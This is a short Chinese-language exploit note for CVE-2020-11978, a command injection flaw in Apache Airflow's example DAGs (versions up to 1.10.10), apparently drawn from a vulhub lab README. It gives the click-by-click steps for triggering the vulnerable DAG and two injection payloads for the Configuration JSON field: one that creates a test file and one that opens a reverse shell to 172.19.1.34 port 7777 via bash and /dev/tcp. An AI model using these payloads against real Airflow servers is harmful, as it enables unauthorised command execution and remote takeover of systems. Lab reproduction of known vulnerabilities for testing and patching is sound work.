Apache Airflow 示例dag中的命令注入(CVE-2020-11978)
https://github.com/vulhub/vulhub/blob/master/airflow/CVE-2020-11978/README.zh-cn.md
影响范围:Apache Airflow <= 1.10.10
访问http://your-ip:8080
进入airflow管理端,将example_trigger_target_dag
前面的Off改为On:
再点击执行按钮,在Configuration JSON中输入:{"message":"'\";touch /tmp/airflow_dag_success;#"}
,再点Trigger
执行dag:即可攻击成功
getshell-exp
{"message":"'\";bash -i >& /dev/tcp/172.19.1.34/7777 0>&1;#"}